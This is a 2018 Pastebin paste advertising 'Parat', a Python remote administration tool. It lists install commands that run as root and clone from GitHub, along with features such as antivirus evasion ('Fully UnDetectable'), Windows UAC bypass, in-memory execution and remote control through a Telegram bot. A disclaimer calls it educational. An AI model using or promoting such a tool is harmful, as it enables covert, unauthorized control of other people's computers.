TVT618

Parat - A Remote Administration Tool (RAT) written in Python

Aug 14th, 2018
805
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.02 KB | None | 0 0
  1. Parat
  2. Parat is a simple remote administration tool(RAT) written in python. Also you can read wiki!
  3.  
  4. Note: Parat is NOT for real attacks. It simply designed for educational purposes only and so is not responsible for any abusive/offensive uses.
  5.  
  6. Install and Run:
  7. sudo su
  8. git clone https://github.com/fadinglr/Parat
  9. cd Parat
  10. python main.py
  11.  
  12. Features:
  13. * Fully UnDetectable(FUD)
  14. * Compatible with Telegram messanger
  15. * Bypass Windows User Account Control(UAC)
  16. * Memory executation
  17. * No any requirments to setup
  18.  
  19. Telegram:
  20. You can communicate parat using telegram messanger. For this do steps:
  21. * Open telegram.service file by an editor
  22. * Insert your bot token on line 15, replaced on YOUR_BOT_TOKEN
  23. * Run telegram.service by typing: python telegram.service
  24. * Now you can use your bot to control parat :)
  25. * A very simple bot for example exist on @ParatKitBot. (Deactived)
  26.  
  27. Feel free to share us your comment!
  28.  
  29. Screenshot:
  30.  
  31. Download Parat: https://github.com/fadinglr/Parat
Advertisement
Add Comment
Please, Sign In to add comment